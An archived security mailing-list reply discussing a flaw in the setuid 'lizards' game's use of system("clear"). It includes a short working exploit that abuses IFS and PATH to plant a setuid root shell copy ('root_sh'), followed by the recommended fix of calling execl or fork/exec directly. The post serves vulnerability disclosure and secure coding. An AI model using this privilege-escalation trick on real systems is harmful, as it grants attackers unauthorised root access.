Re: Vunerability in Lizards game

• Messages sorted by: [ date ][ thread ][ subject ][ author ]
• Previous message: Efrain Torres Mejia: "(LOWNOISE) Another Digital Unix Security Problem0"
• In reply to: Neil Levine: "Re: Vunerability in Lizards game"

John Dow said previously:

|  - but then again, my system("clear") wasn't particularly
| elegant either. How about system("/usr/bin/clear")?

That won't work.  An attack along these lines will slice through
that "fix" pretty quickly, if I'm not mistaken.

export IFS=/
export PATH=.:$PATH
echo "cp /bin/sh ./root_sh; chmod 4755 ./root_sh" > ./usr
chmod 755 ./usr
lizards

:-)

"system()" is just not cut out for security.

*slightly* better would be to exec /usr/bin/clear directly with
a fork/exec.  Or, if your exiting the game completely at that point
(eg. you have nothing left to do at that point), just do an

        execl("/usr/bin/clear","clear",0);

and be done with it.

Regards,

--Joe

--
 +------------ Joseph Zbiciak -----------+
 |- - - - -  j-zbiciak1@ti.com  - - - - -|   You have the capacity to
 | - http://www.primenet.com/~im14u2c/ - |   learn from mistakes.
 |- - - -Texas Instruments, Dallas- - - -|   You will learn alot today.
 +------#include <std_disclaimer.h>------+

• Previous message: Efrain Torres Mejia: "(LOWNOISE) Another Digital Unix Security Problem0"
• In reply to: Neil Levine: "Re: Vunerability in Lizards game"